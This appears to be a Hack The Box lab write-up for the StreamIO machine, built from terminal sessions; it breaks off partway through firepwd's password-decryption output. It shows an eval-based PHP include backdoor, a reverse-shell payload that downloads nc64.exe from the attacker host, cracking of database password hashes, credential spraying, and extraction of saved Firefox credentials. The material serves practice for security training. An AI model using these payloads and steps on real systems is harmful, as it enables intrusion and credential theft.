PGgxPk1vdmllIG1hbmFnbWVudDwvaDE+DQo8P3BocA0KaWYoIWRlZmluZWQoJ2luY2x1ZGVkJykpDQoJZGllKCJPbmx5IGFjY2Vzc2FibGUgdGhyb3VnaCBpbmNsdWRlcyIpOw0KaWYoaXNzZXQoJF9QT1NUWydtb3ZpZV9pZCddKSkNCnsNCiRxdWVyeSA9ICJkZWxldGUgZnJvbSBtb3ZpZXMgd2hlcmUgaWQgPSAiLiRfUE9TVFsnbW92aWVfaWQnXTsNCiRyZXMgPSBzcWxzcnZfcXVlcnkoJGhhbmRsZSwgJHF1ZXJ5LCBhcnJheSgpLCBhcnJheSgiU2Nyb2xsYWJsZSI9PiJidWZmZXJlZCIpKTsNCn0NCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIG1vdmllcyBvcmRlciBieSBtb3ZpZSI7DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp3aGlsZSgkcm93ID0gc3Fsc3J2X2ZldGNoX2FycmF5KCRyZXMsIFNRTFNSVl9GRVRDSF9BU1NPQykpDQp7DQo/Pg0KDQo8ZGl2Pg0KCTxkaXYgY2xhc3M9ImZvcm0tY29udHJvbCIgc3R5bGU9ImhlaWdodDogM3JlbTsiPg0KCQk8aDQgc3R5bGU9ImZsb2F0OmxlZnQ7Ij48P3BocCBlY2hvICRyb3dbJ21vdmllJ107ID8+PC9oND4NCgkJPGRpdiBzdHlsZT0iZmxvYXQ6cmlnaHQ7cGFkZGluZy1yaWdodDogMjVweDsiPg0KCQkJPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ij9tb3ZpZT0iPg0KCQkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im1vdmllX2lkIiB2YWx1ZT0iPD9waHAgZWNobyAkcm93WydpZCddOyA/PiI+DQoJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tc20gYnRuLXByaW1hcnkiIHZhbHVlPSJEZWxldGUiPg0KCQkJPC9mb3JtPg0KCQk8L2Rpdj4NCgk8L2Rpdj4NCjwvZGl2Pg0KPD9waHANCn0gIyB3aGlsZSBlbmQNCj8+DQo8YnI+PGhyPjxicj4NCjxoMT5TdGFmZiBtYW5hZ21lbnQ8L2gxPg0KPD9waHANCmlmKCFkZWZpbmVkKCdpbmNsdWRlZCcpKQ0KCWRpZSgiT25seSBhY2Nlc3NhYmxlIHRocm91Z2ggaW5jbHVkZXMiKTsNCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIHVzZXJzIHdoZXJlIGlzX3N0YWZmID0gMSAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0KaWYoaXNzZXQoJF9QT1NUWydzdGFmZl9pZCddKSkNCnsNCj8+DQo8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1zdWNjZXNzIj4gTWVzc2FnZSBzZW50IHRvIGFkbWluaXN0cmF0b3I8L2Rpdj4NCjw/cGhwDQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDEiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ic3RhZmZfaWQiIHZhbHVlPSI8P3BocCBlY2hvICRyb3dbJ2lkJ107ID8+Ij4NCgkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnRuIGJ0bi1zbSBidG4tcHJpbWFyeSIgdmFsdWU9IkRlbGV0ZSI+DQoJCQk8L2Zvcm0+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KPC9kaXY+DQo8P3BocA0KfSAjIHdoaWxlIGVuZA0KPz4NCjxicj48aHI+PGJyPg0KPGgxPlVzZXIgbWFuYWdtZW50PC9oMT4NCjw/cGhwDQppZighZGVmaW5lZCgnaW5jbHVkZWQnKSkNCglkaWUoIk9ubHkgYWNjZXNzYWJsZSB0aHJvdWdoIGluY2x1ZGVzIik7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJfaWQnXSkpDQp7DQokcXVlcnkgPSAiZGVsZXRlIGZyb20gdXNlcnMgd2hlcmUgaXNfc3RhZmYgPSAwIGFuZCBpZCA9ICIuJF9QT1NUWyd1c2VyX2lkJ107DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlcl9pZCIgdmFsdWU9Ijw/cGhwIGVjaG8gJHJvd1snaWQnXTsgPz4iPg0KCQkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXNtIGJ0bi1wcmltYXJ5IiB2YWx1ZT0iRGVsZXRlIj4NCgkJCTwvZm9ybT4NCgkJPC9kaXY+DQoJPC9kaXY+DQo8L2Rpdj4NCjw/cGhwDQp9ICMgd2hpbGUgZW5kDQo/Pg0KPGJyPjxocj48YnI+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiPg0KPGlucHV0IG5hbWU9ImluY2x1ZGUiIGhpZGRlbj4NCjwvZm9ybT4NCjw/cGhwDQppZihpc3NldCgkX1BPU1RbJ2luY2x1ZGUnXSkpDQp7DQppZigkX1BPU1RbJ2luY2x1ZGUnXSAhPT0gImluZGV4LnBocCIgKSANCmV2YWwoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydpbmNsdWRlJ10pKTsNCmVsc2UNCmVjaG8oIiAtLS0tIEVSUk9SIC0tLS0gIik7DQp9DQo/Pg==
---
Decode base64
If there’s a POST parameter "include", it will use "file_get_contents"
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat master.php_php_filtr| base64 -d | tee master.php_php_filtr_decoded
base64: invalid input
<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
Create reverse shell - yoshihide¶
Prepare revshell: revshell.php¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat revshell.php
system("powershell -c wget 10.10.14.6/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.14.6 443");
Run Python webserver on port 80¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.158 - - [04/Apr/2024 15:40:25] "GET /revshell.php HTTP/1.0" 200 -
10.10.11.158 - - [04/Apr/2024 15:40:25] "GET /nc64.exe HTTP/1.1" 200 -
Sent request via POST (curl)¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ curl -k -X POST -d "include=http://10.10.14.6/revshell.php" -b "PHPSESSID=sarnm1o7pdvrh50o5tu03rheqe" "https://streamio.htb/admin/?debug=master.php"
Start listening netcat on port 443¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
Whoami - yoshihide¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.158] 59265
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Access to backup database¶
Find creds to old databse¶
I read a file: search.php and found query section:
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
___
PS C:\inetpub\watch.streamio.htb> pwd
pwd
Path
----
C:\inetpub\watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> type search.php
type search.php
<?php
$search = strtolower($_POST['q']);
// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
if (preg_match( $shitword, $search )) {
header("Location: https://watch.streamio.htb/blocked.php");
die("blocked");
}
}
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
else
{
$_SESSION['no_of_reqs'] +=1;
$query = "select * from movies where movie like '%".$_POST['q']."%' order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Streamio</title>
<link rel = "icon" href="static/icon.png" type = "image/x-icon">
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<link rel="stylesheet" type="text/css" href="static/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="static/css/search.css">
<script type="text/javascript">
function unavailable() {
alert("Movie Steaming is currently unavailable due to Some security issues");
}
</script>
</head>
<body>
<center>
<img id="logo" src="static/logo.png">
</center>
<br><br>
<h3>Search for a movie:</h3>
<form action="/search.php" method="POST">
<div class="input-group">
<input type="text" name="q" class="form-control" autofocus>
<button type="submit" class="btn btn-primary">Search</button>
</div>
</form>
<br><br>
<div>
<?php
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
echo '<div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">'.$row["movie"].'</h5>
</div>
<div class="ms-auto p-2">
<span class="">'.$row["year"] .'</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div>';
}
?>
</div>
</body>
</html>
Find another strings of the same format¶
We found:
C:\inetpub\streamio.htb\admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" =>
'B1@hB1@hB1@h');
C:\inetpub\streamio.htb\login.php:47:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
___
PS C:\inetpub\watch.streamio.htb> dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC1' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC1:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC2' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC2:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC3' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC3:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
C:\inetpub\streamio.htb\admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\admin\index.php:10:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" =>
'B1@hB1@hB1@h');
C:\inetpub\streamio.htb\login.php:47:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\register.php:82: $handle = sqlsrv_connect('(local)',$connection);
dir : Access to the path 'C:\inetpub\temp\appPools' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\temp\appPools:String) [Get-ChildItem], UnauthorizedAccessE
xception
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\temp\IIS Temporary Compressed Files' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\temp...ompressed Files:String) [Get-ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
search.php:16:$handle = sqlsrv_connect('(local)',$connection);
Read useranem and password from backup of database (streamio_backup DB)¶
We have tool sqlcmd on the vicim
PS C:\inetpub\streamio.htb\admin> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
PS C:\inetpub\streamio.htb\admin>
---
1 Show all
PS C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
table_name
--
movies
users
---
2 List all username and password
(8 rows affected)
PS C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
Crack passwords¶
Create text file with login and hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db_backup_hash_prev | awk '{print $2":"$3}' | tee user_password_db_backup_hash
nikk37:389d14cb8e4e9b94b137deb1caf0612a
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
James:c660060492d9edcaa8332d89c99c9239
Theodore:925e5408ecb67aea449373d668b7359e
Samantha:083ffae904143c4796e464dac33c1f7d
Lauren:08344b85b329d7efd611b7a7743e8a09
William:d62be0dc82071bccc1322d64ec5b6c51
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Cracking hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db_backup_hash /usr/share/wordlists/rockyou.txt -m0 --user --show
nikk37:389d14cb8e4e9b94b137deb1caf0612a:[email protected]
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Crackmapexec¶
Create files: users and password files¶
Create file: users and password (it is list username and password from hashcat files outputs)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output user_password_db_backup_hash | awk -F':' '{print $1}' > users
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output user_password_db_backup_hash_output | awk -F':' '{print $3}' > password
Find login and password to login¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec smb 10.10.11.158 -u users -p password --continue-on-success | grep "+"
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec winrm 10.10.11.158 -u users -p password --continue-on-success | grep "+"
WINRM 10.10.11.158 5985 DC [+] streamIO.htb\nikk37:[email protected] (Pwn3d!)
Evil-winrm¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ evil-winrm -u nikk37 -p '[email protected]' -i 10.10.11.158
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
streamio\nikk37 S-1-5-21-1470860369-1569627196-4264678630-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt¶
*Evil-WinRM* PS C:\Users\nikk37\Documents>
c*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ..
c*Evil-WinRM* PS C:\Users\nikk37> cd Desktop
*Evil-WinRM* PS C:\Users\nikk37\Desktop> dir
Directory: C:\Users\nikk37\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/8/2024 8:56 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\Desktop> type user.txt
dce217496720adbf24480d1686da09c3
*Evil-WinRM* PS C:\Users\nikk37\Desktop>
Find passwords from Firefox folder¶
Download firepwd.py¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ git clone https://github.com/lclevy/firepwd.git
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80
Receiving objects: 100% (88/88), 239.08 KiB | 832.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cd firepwd
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
└─$ dir
firepwd.py LICENSE mozilla_db mozilla_pbe.pdf mozilla_pbe.svg readme.md requirements.txt
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
Download files: key4.db and logins.json¶
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release> download key4.db
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release\key4.db to key4.db
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release> download logins.json
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release\logins.json to logins.json
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release>
Extract passwords¶
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
└─$ python3 firepwd.py
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
